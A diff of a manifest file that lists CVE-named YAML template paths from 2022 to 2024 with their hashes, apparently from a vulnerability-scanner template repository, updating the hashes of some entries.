http/cves/2022/CVE-2022-45917.yaml:61c7b1e4aea504a6200608daf06cd0dabd9aac11 http/cves/2022/CVE-2022-45933.yaml:d2e93f82eeb07d6d4a8446561e445f4ac0add991 @@ -3221,7 +3221,7 @@ http/cves/2023/CVE-2023-0099.yaml:cdfed327c29ff370e6b06c37aa366dab18e1165f http/cves/2023/CVE-2023-0126.yaml:6622dccea76462d0952ff1db6e35da809393d97a http/cves/2023/CVE-2023-0159.yaml:a85107774c5ea63b6f61096087ecf6c5555e60fe http/cves/2023/CVE-2023-0236.yaml:59baf08b76758762d47f413d236485cf5b319dce -http/cves/2023/CVE-2023-0261.yaml:5087fa9d04efc600b41de02fcac82bda2bcf0595 +http/cves/2023/CVE-2023-0261.yaml:8a6b739317534dcb26679061935a2cf040bb1e68 http/cves/2023/CVE-2023-0297.yaml:075f7dc39d64a5511ff4471e2f77abbb87991cc2 http/cves/2023/CVE-2023-0334.yaml:e64c269ae26b3ae9cc1018c96b7c988d1ce7d16b http/cves/2023/CVE-2023-0448.yaml:602dc4fb8805fa78abee06c6aaea0e867a814943 @@ -3230,14 +3230,14 @@ http/cves/2023/CVE-2023-0527.yaml:e2ce6556221604eb1a240ee35fe9b2ffc3bbdea5 http/cves/2023/CVE-2023-0552.yaml:5ee8de972f89dc61566d00978c7365a55f9df39e http/cves/2023/CVE-2023-0562.yaml:86e35de0ffd83e90947e7c4b0b49836230bde3bc http/cves/2023/CVE-2023-0563.yaml:5826a789671414b74d945727d46e2868a0030eb9 -http/cves/2023/CVE-2023-0600.yaml:fcfb1a40a3cd2e7df90c774102fd125bd335b405 +http/cves/2023/CVE-2023-0600.yaml:fd0c53862dc20971954409e994abe7c752735cc9 http/cves/2023/CVE-2023-0602.yaml:e31c5d2abf85c2ee480612417a8d6a784ea0c190 -http/cves/2023/CVE-2023-0630.yaml:835b6359ffe1bd3f526ad9ae4b34e0d41c12852a +http/cves/2023/CVE-2023-0630.yaml:d8d997e9dc54dcb4757157360cc59de15fc49d71 http/cves/2023/CVE-2023-0669.yaml:8b9956b2b579a7e3030f18be3f3d24569cb6733c http/cves/2023/CVE-2023-0676.yaml:e89042c83cb3ae0b8acf78cf049a7035357cd95d http/cves/2023/CVE-2023-0678.yaml:425a6993c9f4095a50e255ef189c02c5cbc6c9c2 http/cves/2023/CVE-2023-0777.yaml:5f28117981d93630dd24ebef0d1505b0237eb797 -http/cves/2023/CVE-2023-0900.yaml:cbef37de88d0b61540d3d8b63c80c09960b6c21e +http/cves/2023/CVE-2023-0900.yaml:8f1c8dc5f63ce9d7d117c71ad428863049b66040 http/cves/2023/CVE-2023-0942.yaml:fcb0811220da813890a775f5c00e2f91cf2c340b http/cves/2023/CVE-2023-0947.yaml:046fceff57f0093c097c23e5c1d6d3e1c5641a04 http/cves/2023/CVE-2023-0948.yaml:c0b92cf821b6f4b80dd5135d77ad852a8049a9bb @@ -3250,7 +3250,7 @@ http/cves/2023/CVE-2023-1315.yaml:2178e336e062101eb8b803c9d4623a65d90ac012 http/cves/2023/CVE-2023-1317.yaml:bc90b04475017347f029200a10707ee655152170 http/cves/2023/CVE-2023-1318.yaml:e71827e51da108f102f00a8d10b1b9d2a862fab1 http/cves/2023/CVE-2023-1362.yaml:6e432a7601e15e3e50f24c19ef101f6395404113 -http/cves/2023/CVE-2023-1408.yaml:2c3e73f4296c1f9606b8e377436ebdbfe1f715e2 +http/cves/2023/CVE-2023-1408.yaml:13b963f93cdb2e7f3855da60a656e5335b134637 http/cves/2023/CVE-2023-1434.yaml:93e41771aad3b211bd99c40258acee718147332a http/cves/2023/CVE-2023-1454.yaml:e0b6ba7bc52ecb2e58d67b61ca3ef3010851a0fc http/cves/2023/CVE-2023-1496.yaml:a3dffd4626c1929eb68a80f04c2db3efc0e27b0d @@ -3258,7 +3258,7 @@ http/cves/2023/CVE-2023-1546.yaml:8c8e4f20d034c05c48d5cdd431661c5b40ef7860 http/cves/2023/CVE-2023-1671.yaml:bfce13b06dfca9dc2f709e5329685c243679c022 http/cves/2023/CVE-2023-1698.yaml:9134e40af81f8088b26bc1ad2b63b77453179c88 http/cves/2023/CVE-2023-1719.yaml:109f43d7122a1b53a284d1653b2a7b998f63f483 -http/cves/2023/CVE-2023-1730.yaml:db103227ee8d88ba94638a6b952356057f095ae2 +http/cves/2023/CVE-2023-1730.yaml:33ae8007ffd1791df07545c0276bcfabc645bede http/cves/2023/CVE-2023-1780.yaml:621e1a9e470723487065088b68c3da0d8b403231 http/cves/2023/CVE-2023-1835.yaml:7ab9a0bbb750d52119b8c764277bd2b2b3d7ef96 http/cves/2023/CVE-2023-1880.yaml:00d09d7b221180a15759e6629e3279c98cd53ea5 @@ -3274,7 +3274,7 @@ http/cves/2023/CVE-2023-20887.yaml:44966b90bec19e4fa0bac9a61cb3287c5c91cb5a http/cves/2023/CVE-2023-20888.yaml:bd6a1c13757ff2fa456692f087da135cbef044c4 http/cves/2023/CVE-2023-20889.yaml:725ac833dc8e144d85358409437967ad0c1566e8 http/cves/2023/CVE-2023-2122.yaml:7dca84047ac5d644ee1d20ea67b70e4bd36947ed -http/cves/2023/CVE-2023-2130.yaml:314de8c387b9e0bd75dd8a98f0c7283185b83db9 +http/cves/2023/CVE-2023-2130.yaml:880b19563a55b021284a5c457d2667bd16613876 http/cves/2023/CVE-2023-2178.yaml:3907c43ef047c7398dd6c6075b7eb37f81431e7f http/cves/2023/CVE-2023-22232.yaml:e9ad9578a27839575db8e7a9095c2fab69104653 http/cves/2023/CVE-2023-2224.yaml:e0d9099e5025c8aa7b3e29c3aa6ba735e4be50f2 @@ -3295,8 +3295,8 @@ http/cves/2023/CVE-2023-22897.yaml:b79dbca06ddb56668881397e8ded0c7189a8ca79 http/cves/2023/CVE-2023-2309.yaml:10c1b4957845c40fa4c09e4576c21ce8ac11d8da http/cves/2023/CVE-2023-23161.yaml:bba84f830ad38a31c2d338fabc553dbc0e1be8b7 http/cves/2023/CVE-2023-23333.yaml:bb8afd05703411ed6fe92a571938a6dc46183f2a -http/cves/2023/CVE-2023-23488.yaml:4701ba1c43a8888bef0092585a3666bc4e3809b5 -http/cves/2023/CVE-2023-23489.yaml:eb3988e79364bf65b6116f6040271a11ba06908d +http/cves/2023/CVE-2023-23488.yaml:d617c82e430850588f39c0ea52b249882459bba7 +http/cves/2023/CVE-2023-23489.yaml:fea6333d35018fbbfcbc96fbb46d9e12cce91724 http/cves/2023/CVE-2023-23491.yaml:30046ed227b359bae6f8e485f89933d9955612da http/cves/2023/CVE-2023-23492.yaml:16fa0c1fc4002b952a33b61d3fabc64636ac7f23 http/cves/2023/CVE-2023-2356.yaml:83f12f25896993aaa17f815a0e62f12e24370a94 @@ -3331,8 +3331,8 @@ http/cves/2023/CVE-2023-2648.yaml:115c18dc80d6995749913141a2564a18a30024d6 http/cves/2023/CVE-2023-26842.yaml:9ba42ef7713a2da2a394f4d7eb4a128b86fac335 http/cves/2023/CVE-2023-26843.yaml:8fe63e31bbec18e14832dc356cc39ad9fa68aac6 http/cves/2023/CVE-2023-27008.yaml:89f280cda02c4427fcf219fa854932e9afe579b8 -http/cves/2023/CVE-2023-27032.yaml:00d48c87fdf5444e3c3110e2d4a58e82106b4b2a -http/cves/2023/CVE-2023-27034.yaml:24fb10f78e5636c70fd9263cb2b1084dbe9d2b8a +http/cves/2023/CVE-2023-27032.yaml:df27a3ce2fadbf493ebfdefc504e834938657bf0 +http/cves/2023/CVE-2023-27034.yaml:2c4443fc2d36c84e0c46c48e4fee2dc4286d66db http/cves/2023/CVE-2023-27159.yaml:e7089fce651bf330cc93fb75775796211008035e http/cves/2023/CVE-2023-27179.yaml:ad65cc149fce2fce2602528559e5ce2648f309e9 http/cves/2023/CVE-2023-27292.yaml:997c516c2037ee0b3607afa2074852e4ea30006e @@ -3349,7 +3349,7 @@ http/cves/2023/CVE-2023-27641.yaml:459a05108f318b7d59e2075a763e8dae0234d12e http/cves/2023/CVE-2023-2766.yaml:24c190c745c0951e2c6db6672aa824d960149799 http/cves/2023/CVE-2023-2779.yaml:8f901cbf94797358ec2e4eae2c6cfdf8955af305 http/cves/2023/CVE-2023-2780.yaml:bb7789bbd42db90ddc3fc599cf82b48751b640b7 -http/cves/2023/CVE-2023-27847.yaml:fad0cc8ee183b4daeefed7a85d3cc1444659c6a6 +http/cves/2023/CVE-2023-27847.yaml:f891348bb0987438939b29be55fd4311c6610a63 http/cves/2023/CVE-2023-27922.yaml:f1c1540bd8ccf6e832690facd76287109c579359 http/cves/2023/CVE-2023-2796.yaml:bbe90b702fd73fa350d56644b7f72420e32a698f http/cves/2023/CVE-2023-28121.yaml:1e68ea14d35be9823d0510222f17fe122654dbdd @@ -3358,7 +3358,7 @@ http/cves/2023/CVE-2023-2822.yaml:832b20338fa90959828ef3e67d5e817cd557a8aa http/cves/2023/CVE-2023-2825.yaml:92feef41f6a25642c5215adcb38592b71c0462c9 http/cves/2023/CVE-2023-28343.yaml:0252ea544fae8e4c4601f1ec39ab3d55115cba0f http/cves/2023/CVE-2023-28432.yaml:55e5c982b19f567942ceb8ab4ac57446750405c9 -http/cves/2023/CVE-2023-28662.yaml:db8a8150ddf3eeb5658b6a1f890fbda8f0904d59 +http/cves/2023/CVE-2023-28662.yaml:81195a6d12f14fb2742139f408340ef4fa56741c http/cves/2023/CVE-2023-28665.yaml:c7ea34160278c858993ca4e151493a66c041e685 http/cves/2023/CVE-2023-29084.yaml:7335430074b2cdc90b92637fcf2145c3a2cdbb5a http/cves/2023/CVE-2023-29204.yaml:4f9c361d223ff2788c57b39f5dce6b76a910fb31 @@ -3379,14 +3379,14 @@ http/cves/2023/CVE-2023-29922.yaml:f0da9a62d02badbf7ac6b2ba807c94a38d666388 http/cves/2023/CVE-2023-29923.yaml:cc106f6716a44a5aeca4a0abedc26408543c85b6 http/cves/2023/CVE-2023-30013.yaml:a7e4c7bc35c13f4d515cd586604b091640fe0594 http/cves/2023/CVE-2023-30019.yaml:717d5bc6c8b2c31bfc2edd5c68bf2052492faaa8 -http/cves/2023/CVE-2023-30150.yaml:70793eb3c9090bad36e8793f03db4171c5c5983d +http/cves/2023/CVE-2023-30150.yaml:2d9c3676a2979f4a6d58944eb5c9df0250e936d3 http/cves/2023/CVE-2023-30210.yaml:5813ad5f81384f32da9b1376920592d190809922 http/cves/2023/CVE-2023-30212.yaml:e78558d9584338de17429906728f353dca4265ac http/cves/2023/CVE-2023-30256.yaml:21511c5e34cd98222ff485ca650f32c54ea3464d http/cves/2023/CVE-2023-30258.yaml:23dba33b4278040835f2427ff06c4cab132b3625 http/cves/2023/CVE-2023-30534.yaml:bce02358f392d2ede744df019b9c54bd5fffe9c3 http/cves/2023/CVE-2023-30625.yaml:5cdf3a74958ba59dc965b31f8d53010dd466ab95 -http/cves/2023/CVE-2023-3077.yaml:cebbef9ab34764a6f193803c5f20aa535599cc56 +http/cves/2023/CVE-2023-3077.yaml:6025b7574b341fa33b688ffa28b882d37a410f33 http/cves/2023/CVE-2023-30777.yaml:2ec94a35275ee1271b6d0162b11c66c4325d8c33 http/cves/2023/CVE-2023-30868.yaml:7be43ec76fe6720e2d580becb0a56a9dc9064584 http/cves/2023/CVE-2023-30943.yaml:8a721fd678d41f3c5366dbdfcaac7fc3479f881c @@ -3425,12 +3425,12 @@ http/cves/2023/CVE-2023-34598.yaml:0b38abd88b3fc2ac7790d931685f45cb92433619 http/cves/2023/CVE-2023-34599.yaml:0d749847fc42f3fc2a879d43fa3beecbd43b6091 http/cves/2023/CVE-2023-3460.yaml:2ba192fea89458954299c6b16ad3558abc8cc29a http/cves/2023/CVE-2023-34659.yaml:a165041e2b2c2e808d2ad5e955340a29696b62cb -http/cves/2023/CVE-2023-34751.yaml:c7ade34613bb0f06a616df8bbd0872e36d01843f -http/cves/2023/CVE-2023-34752.yaml:3d8c689180646565263c37930c73e2fc928ad52a -http/cves/2023/CVE-2023-34753.yaml:d2e51c1cbde33bdd5ac0621fde12b00d4ee4535c -http/cves/2023/CVE-2023-34754.yaml:e53020d6459e2ee6140552c2f8694081443b1823 -http/cves/2023/CVE-2023-34755.yaml:d2312cced14cdc6863cea38517d0e3ccffa82d04 -http/cves/2023/CVE-2023-34756.yaml:1a4b15b7d48db2873ab2a3025c6e3eedffe0a005 +http/cves/2023/CVE-2023-34751.yaml:0253f88a4c4aeec3833263778fc4377b02aed29b +http/cves/2023/CVE-2023-34752.yaml:b0206d753b2846b0718e8e0a9a558c3ba1c91013 +http/cves/2023/CVE-2023-34753.yaml:998871e5ab6580f3e4f94460db04c63051b3e4e6 +http/cves/2023/CVE-2023-34754.yaml:74ad5970715a4d01d65dfb24347632c36540e69b +http/cves/2023/CVE-2023-34755.yaml:9a9a1475542397ae714d07c47aee9f76c3ed7519 +http/cves/2023/CVE-2023-34756.yaml:91f4eea713af966ff7e6c1246abfdeecb6c3b8ce http/cves/2023/CVE-2023-3479.yaml:afc9997aba1f80f49a5d4cc9091de129be686a9c http/cves/2023/CVE-2023-34843.yaml:402a7cd51d6553c404753eab05b0fc48649f9df9 http/cves/2023/CVE-2023-34960.yaml:4e27c9bf1526aee4e168645550f2a85595b7df7a @@ -3451,7 +3451,7 @@ http/cves/2023/CVE-2023-35843.yaml:fff3bc3dfbc836e0287b00ec362b9c5dda57a0a0 http/cves/2023/CVE-2023-35844.yaml:362b88178a6958a161fe8498be0caf3694119e36 http/cves/2023/CVE-2023-35885.yaml:9d072bf2597d38fb0798e00bedfd76c38896d5a3 http/cves/2023/CVE-2023-36144.yaml:d64d5631ea5ace897b3d1a2ed53e67a413b4884c -http/cves/2023/CVE-2023-36284.yaml:73b7811f12b0141d7c70db5af7cdb072b4e6c514 +http/cves/2023/CVE-2023-36284.yaml:f5ea7d540845c7bfb28ee6b347a257486990bf8d http/cves/2023/CVE-2023-36287.yaml:7f3341d0aa2cfaf19f8b259f6d6e9b3667aef2b5 http/cves/2023/CVE-2023-36289.yaml:4626b6dbf62ee313dfa3e667ad3f6e8ea8cb1c01 http/cves/2023/CVE-2023-36306.yaml:674f574793a5920dcb55fff45751621aad280b71 @@ -3502,14 +3502,14 @@ http/cves/2023/CVE-2023-39120.yaml:fe50f8e80ac67803942ed0b7fd0204e8f1fadbfc http/cves/2023/CVE-2023-39141.yaml:5c097eab47126884038a33c190ddfc7297c39d52 http/cves/2023/CVE-2023-39143.yaml:91450c9ec6eddea14476f04d97048014420cbafb http/cves/2023/CVE-2023-3936.yaml:86f325fd48ca47e7f4cdfe3581027bc2514c4f12 -http/cves/2023/CVE-2023-39361.yaml:4c151037ccf599d9d2d4cb870aaf0fd9c4af8037 +http/cves/2023/CVE-2023-39361.yaml:cfcc7a27548897f21c195485790f2708404bf00c http/cves/2023/CVE-2023-39598.yaml:08416090607df77a064737cf04fbee229e009b57 http/cves/2023/CVE-2023-39600.yaml:7bc52c9f178223c128a174a171353c694429c88e -http/cves/2023/CVE-2023-39650.yaml:07e498c312b0be3d107271772bfea1befde7ab01 +http/cves/2023/CVE-2023-39650.yaml:23a33d23da4458af9dea93ef3543bf0ed436e780 http/cves/2023/CVE-2023-39676.yaml:85436c487f3535f724b8b552987b8564b715a2a4 http/cves/2023/CVE-2023-39677.yaml:379d594ca8bbfea196d292c1856da7eae11b3332 http/cves/2023/CVE-2023-39700.yaml:abd644de09232548601e5d2d693d4c054e1b42a0 -http/cves/2023/CVE-2023-39796.yaml:720375efff19cad0ac4c72ade3accbcf6824e2be +http/cves/2023/CVE-2023-39796.yaml:682953ea708230483bace47b5ca4963521ca6c69 http/cves/2023/CVE-2023-40208.yaml:3bd72bed6969fb8149de3c31b7909d9c88799d1f http/cves/2023/CVE-2023-40355.yaml:7761faee9b0236c926e300d32db3a9508227204d http/cves/2023/CVE-2023-40504.yaml:786ccb92d83ff6d919fa12f2b629f5c19560f611 @@ -3549,7 +3549,7 @@ http/cves/2023/CVE-2023-43261.yaml:4c534b1a5dd5916c25664920de4051ffa1310bf1 http/cves/2023/CVE-2023-43323.yaml:5183007ec76bec6426ec05e856fa9449e058935a http/cves/2023/CVE-2023-43325.yaml:cad3358ef79bdf761c1bbb77c839e9af325f506f http/cves/2023/CVE-2023-43326.yaml:f117aa600d3815d4394d93563495b9a183a6b76d -http/cves/2023/CVE-2023-43374.yaml:e776da19a0b00d4c913d7c1b0beab3657841b351 +http/cves/2023/CVE-2023-43374.yaml:c2bf344b526f572781108bb2821aac0ffa43a1a2 http/cves/2023/CVE-2023-43472.yaml:02352f22f7347c7ca98b3eb51d6851fcba2f0b40 http/cves/2023/CVE-2023-43654.yaml:ab23cbdbf187bed9af351fa2b8104bf6018f9ea5 http/cves/2023/CVE-2023-43662.yaml:fd8ea5fc98bf1d082d261d891cfb5566fb78e6ff @@ -3565,7 +3565,7 @@ http/cves/2023/CVE-2023-44812.yaml:11e5628cb888352e0dcd50839df33dc85fb2b58c http/cves/2023/CVE-2023-44813.yaml:ba83815830ad498e3a1e78649d1ddc4a48612025 http/cves/2023/CVE-2023-45136.yaml:2a03499c0b59bd8b7ccc46f6b8c0d20602671b3e http/cves/2023/CVE-2023-4521.yaml:bf7e36be57080136c6ecbbc5e1d1844a5df269ec -http/cves/2023/CVE-2023-45375.yaml:c9630579fbe91ee36adc346d5d5ff2aabe2975ed +http/cves/2023/CVE-2023-45375.yaml:b693d348099fcae577af5662edceaf9be1aaaf93 http/cves/2023/CVE-2023-4542.yaml:c0a79c6b0145c8d875e16d60d6a0fea2632dd99b http/cves/2023/CVE-2023-4547.yaml:f35005a0035fb0980139129649d73a6f577bbd66 http/cves/2023/CVE-2023-45542.yaml:137cadf0894adf5a9bbb7e447a9b7d4d2ca849e6 @@ -3575,7 +3575,7 @@ http/cves/2023/CVE-2023-45852.yaml:29a13005cad157b33728bac40e7096376c822280 http/cves/2023/CVE-2023-45855.yaml:376f8b9d3901193f3de5f1841da162b4dd693ec7 http/cves/2023/CVE-2023-4596.yaml:dff8818a076c4e5fad0e3e189edb9c0a00003d4a http/cves/2023/CVE-2023-4634.yaml:25ca2cd6e1903db0a7bc4d306856e30d2b98f8fc -http/cves/2023/CVE-2023-46347.yaml:c05057fe388d744ac5037d7d4744fa59bc9fa633 +http/cves/2023/CVE-2023-46347.yaml:deef0bb21e37d788508a9c1d367a7bc1202afbed http/cves/2023/CVE-2023-46359.yaml:83426962f0f9937b49f713603c55628d16552b16 http/cves/2023/CVE-2023-46574.yaml:174ebe98cec3e58cd5233927899da721b1003e0c http/cves/2023/CVE-2023-46732.yaml:c877d0e1689f2fb8d52ddd715d165ead948f349d @@ -3593,7 +3593,7 @@ http/cves/2023/CVE-2023-47253.yaml:9043731c077a6d6e3dfe605888031328d28c06e3 http/cves/2023/CVE-2023-47643.yaml:843ad477f4c0847367fb5b5ea156ebba57372f93 http/cves/2023/CVE-2023-47684.yaml:5b869e09858e77eca3415601aeb28902bcca90ae http/cves/2023/CVE-2023-48023.yaml:fa3a9a4556ccb74313830b2568f56d669f317af5 -http/cves/2023/CVE-2023-48084.yaml:6714252dc89c27ea7cda0484f6e45f5c21849ca8 +http/cves/2023/CVE-2023-48084.yaml:c71a713ba83e5a310a9362a11c39fe2d9bd8ae93 http/cves/2023/CVE-2023-48241.yaml:dfc0a5bb442e3fbd259af0a16c5ecedfeb56c758 http/cves/2023/CVE-2023-48728.yaml:30a8054088b9835c1b5c380b03420d54424ae4fd http/cves/2023/CVE-2023-48777.yaml:4db948faded01a8135cc7a52ba2871181b8dab49 @@ -3601,7 +3601,7 @@ http/cves/2023/CVE-2023-49070.yaml:26d50632afda5fb2ae8260a5e386064f3e2d581c http/cves/2023/CVE-2023-49103.yaml:1a61e2197a90af44caca1e85ca6489698e09accc http/cves/2023/CVE-2023-4966.yaml:999c79592f279249903afb708578aae27977c3f9 http/cves/2023/CVE-2023-4973.yaml:b7b931156c9b2e8a81daf5e524200b61a83d8bdf -http/cves/2023/CVE-2023-4974.yaml:903173457ec36bc7a21422fa82994faba8b2dbe1 +http/cves/2023/CVE-2023-4974.yaml:1e37bcc3e4348ce5149ef58967858ee0a5f07cdc http/cves/2023/CVE-2023-49785.yaml:97699a3c262cb416153932623d07c232dc350da0 http/cves/2023/CVE-2023-5003.yaml:4f800fa6ab1df2267322e0b1527e8c7a09829769 http/cves/2023/CVE-2023-50290.yaml:33c022c45e47628e6c1f7865bd10b4dc28c4e37b @@ -3629,7 +3629,7 @@ http/cves/2023/CVE-2023-6020.yaml:961d2933606184b0f24ae6e109589cb6fb5c371b http/cves/2023/CVE-2023-6021.yaml:4d60e98e6464e48f30bfd80a2879c5025b8115b8 http/cves/2023/CVE-2023-6023.yaml:894eda6ad30f9cb75bae9865b552b3d9e1439944 http/cves/2023/CVE-2023-6038.yaml:d0598518a34e87b3df39a996dbc2969ae576fad0 -http/cves/2023/CVE-2023-6063.yaml:1ecdad6bcfb0e958f2073ce2702b0b5f9b4a1068 +http/cves/2023/CVE-2023-6063.yaml:682ad0ad799d421d90d2e608a52cfc0bd5c6566f http/cves/2023/CVE-2023-6065.yaml:9d402d2854231906a58b7fa10219cd189c5c6918 http/cves/2023/CVE-2023-6114.yaml:65353fb14406628586fb741a32c1bf7ec36c46e2 http/cves/2023/CVE-2023-6275.yaml:a69dc119f6b3452b7e7e5709b0d76bdbfdd70dd5 @@ -3641,7 +3641,7 @@ http/cves/2023/CVE-2023-6389.yaml:1442104ed12f70cbab2bdea5effa6e4262a9b95f http/cves/2023/CVE-2023-6444.yaml:0a82a1e5e41a83c6ca66177c063a3ea95cc0171f http/cves/2023/CVE-2023-6505.yaml:84f672dbc2f01d602f46205dd57f62f15dc0e8ed http/cves/2023/CVE-2023-6553.yaml:7a54271ce0dabed297718787b829f3ddc52b256c -http/cves/2023/CVE-2023-6567.yaml:0a7fedde7ec2ac7ec9fc65018c7dd3359d9f0fa7 +http/cves/2023/CVE-2023-6567.yaml:ab3364058a548b7253ae75dc8c5a16e9a660e00b http/cves/2023/CVE-2023-6568.yaml:d5ad024fe0db18fb7abafc3ee7ab29c8e86abb14 http/cves/2023/CVE-2023-6623.yaml:00d70a24f04c9124d433cb202bbe6d5feac8db68 http/cves/2023/CVE-2023-6634.yaml:7d6b2f13c31512686f5c947bca522a303557ab7b @@ -3665,17 +3665,17 @@ http/cves/2024/CVE-2024-0713.yaml:b8ebbe918246b345ca0ec9041ff7b1edea36dda0 http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 http/cves/2024/CVE-2024-0939.yaml:04b5c41f49b6511cf5cf1af97d3d2d1193532833 http/cves/2024/CVE-2024-1021.yaml:c9be400622968f5464c3aed476c4719ddef81b52 -http/cves/2024/CVE-2024-1061.yaml:0851b63bf9a1294ca0f9977c726decf1f4cde1c1 -http/cves/2024/CVE-2024-1071.yaml:8547bd4ccea98543123a420eee7080cc399cda50 +http/cves/2024/CVE-2024-1061.yaml:c4664f3c5549b477e577e8c4d5238eaaa34062a6 +http/cves/2024/CVE-2024-1071.yaml:122dabacac124cc629c45567e338b8a92e38382a http/cves/2024/CVE-2024-1183.yaml:29e4ae8dfbbfc37858b09b99a36dbe792ef9073d http/cves/2024/CVE-2024-1208.yaml:080cd48093b2902e76b14bdeddd38bbba9bc18a9 http/cves/2024/CVE-2024-1209.yaml:2951e4131bf7866fb91570a8d7d12ecd316a68da http/cves/2024/CVE-2024-1210.yaml:7af2bde109e8f0dbb0af5f22cdbcfd5e2c0cc132 http/cves/2024/CVE-2024-1212.yaml:6b1a4784714777f96940e0a8ee7a02b8f92922a4 http/cves/2024/CVE-2024-1380.yaml:f9eb4d2ae21af39d69c1710d9e01fd6feed9b268 -http/cves/2024/CVE-2024-1512.yaml:aa9ecb446e1abbc03acec48e489c0a4aa5b3c053 +http/cves/2024/CVE-2024-1512.yaml:7915177768bedab31700ac88765f3886eeb6892f http/cves/2024/CVE-2024-1561.yaml:100e4b74d20d1d3981ff72f27694e32d3563c0a3 -http/cves/2024/CVE-2024-1698.yaml:518f27b984c8bee42dfc831442cce98cc6906923 +http/cves/2024/CVE-2024-1698.yaml:cd171f392c09242225649814c1a9be2c99379e08 http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a http/cves/2024/CVE-2024-1728.yaml:86e02d6d386815a06986eee121b0b457e0c7d766 http/cves/2024/CVE-2024-20419.yaml:90573af560a4a87579bd7d9a4a17db64540815e3 @@ -3711,7 +3711,7 @@ http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:ae472de4ef9fdfa4ca6dd167105ac75e8eaf4be1 http/cves/2024/CVE-2024-25735.yaml:62e4fcd344865c267789835cfbc7bd1677e002d3 http/cves/2024/CVE-2024-25852.yaml:6e69cac17440172ed48c80463db85250167bb9c8 -http/cves/2024/CVE-2024-2621.yaml:5b501a9ff0e69b8bfd0df0caaf97ebbaaba51301 +http/cves/2024/CVE-2024-2621.yaml:7eaebf60c9a899bf792a1c0c34fd1e2c2506145c http/cves/2024/CVE-2024-26331.yaml:30d3af77f866495f37d5c2a191a6620dc86ff09c http/cves/2024/CVE-2024-27198.yaml:428b5bbb2a88c48db434e13c0fdc3dea195f4a6f http/cves/2024/CVE-2024-27199.yaml:066327cf876dac416005ebd41c09e2bf9c8e0506 @@ -3721,12 +3721,12 @@ http/cves/2024/CVE-2024-27497.yaml:b898a9ccd9f6528a3d1ad4b1b9660b12752104e1 http/cves/2024/CVE-2024-27564.yaml:e2238f85eaafa3841fe950b4a07021a50839f40d http/cves/2024/CVE-2024-27718.yaml:ac86c307164170bac70e3c668aa579e5fc4043f3 http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 -http/cves/2024/CVE-2024-27956.yaml:b6cecd7a2c5dd148c961bcacc9d6bc9075c9b90c +http/cves/2024/CVE-2024-27956.yaml:59e1862fa91f912f71572714f3692448d41afa05 http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8 http/cves/2024/CVE-2024-28397.yaml:681bfa248bb9ab652fe0c9145b7dedda5a64e804 http/cves/2024/CVE-2024-28734.yaml:282a40ba7cd7f653bfbc9f16397b9c6115ca18b1 -http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b -http/cves/2024/CVE-2024-2879.yaml:c2ce4ab84a2eac56ef529eeba7a3749e0394cd43 +http/cves/2024/CVE-2024-2876.yaml:a40eb96607cd1fa42665a14dcfbb6a5a9a354d90 +http/cves/2024/CVE-2024-2879.yaml:9e7b9112d74bd55e7c4c338b21a903afc996986a http/cves/2024/CVE-2024-28987.yaml:44117320901d2c05ffb19150b6dc087ed7cb5b1c http/cves/2024/CVE-2024-28995.yaml:2256abea0b23dd20789317702178afdd5ceb4225 http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca @@ -3779,13 +3779,13 @@ http/cves/2024/CVE-2024-34351.yaml:f7b4ffa237e3ad15845d87cb7227cb296da67ff6 http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:1a1600c46fc3957e0fbd26a696fd5c175367544a -http/cves/2024/CVE-2024-3552.yaml:2e3f842534d31c4e81fb7b2e5e8d862c41902115 +http/cves/2024/CVE-2024-3552.yaml:4b2628acc281bf657a3f5cfb86bb759e5d0220b8 http/cves/2024/CVE-2024-35627.yaml:74692c8d0c6d96bd1b707047004bc91ad0650a8b http/cves/2024/CVE-2024-36104.yaml:c947866029e43be7cdd5aae943b4338e5ad92919 http/cves/2024/CVE-2024-36401.yaml:2439f9a75658efa3cb4cc61de851bce44ed55dec -http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff +http/cves/2024/CVE-2024-36412.yaml:1f57cbef478515718f37a290474753a1ebe76505 http/cves/2024/CVE-2024-36527.yaml:91eaa0df2c1a29ff57238921b54909e2b12f4fdf -http/cves/2024/CVE-2024-36683.yaml:9fb628db04a1e6fd6382a275d1e7035af980039c +http/cves/2024/CVE-2024-36683.yaml:424bd3cd0fcea8f461c5ba7ea9e99b7388199b61 http/cves/2024/CVE-2024-3673.yaml:509aef7623742067ef6139ef9f8c36fa9b2fac49 http/cves/2024/CVE-2024-36837.yaml:e7eb336e92d1b6e46f12e1adf620d8d1aa4a50fe http/cves/2024/CVE-2024-36991.yaml:871d08f99d501e2b11dcdb2329dc31bdc6c50cf6 @@ -3805,7 +3805,7 @@ http/cves/2024/CVE-2024-3850.yaml:e378134d4def6f580ec57607c3183286f72e4aac http/cves/2024/CVE-2024-38514.yaml:0c85431b42999712548153519529b4d054ed473f http/cves/2024/CVE-2024-38816.yaml:cf17b066ee186ae8cc82497e855712e3e6099857 http/cves/2024/CVE-2024-38856.yaml:90c859e0070d75465164d17caf1877524b5fe5bd -http/cves/2024/CVE-2024-3922.yaml:c398c48b2696b36644cbd03105f97157a7b4b56c +http/cves/2024/CVE-2024-3922.yaml:220a547c0aabda07a1c2541604516e8051c5788e http/cves/2024/CVE-2024-39250.yaml:ff485ce5537d94dfd260abb578b3c4d85ecb3797 http/cves/2024/CVE-2024-39713.yaml:e66acb00da95626ead0ac0f700645e624edfe26b http/cves/2024/CVE-2024-39903.yaml:5f5e882db1afe8518a20e0edb57150abae54b674 @@ -3819,18 +3819,18 @@ http/cves/2024/CVE-2024-41628.yaml:eff672be60b09e1e383bfc83c60120acf4eaf11d http/cves/2024/CVE-2024-41667.yaml:2ad69db1796da60afc772fb64e9f2002a3f31837 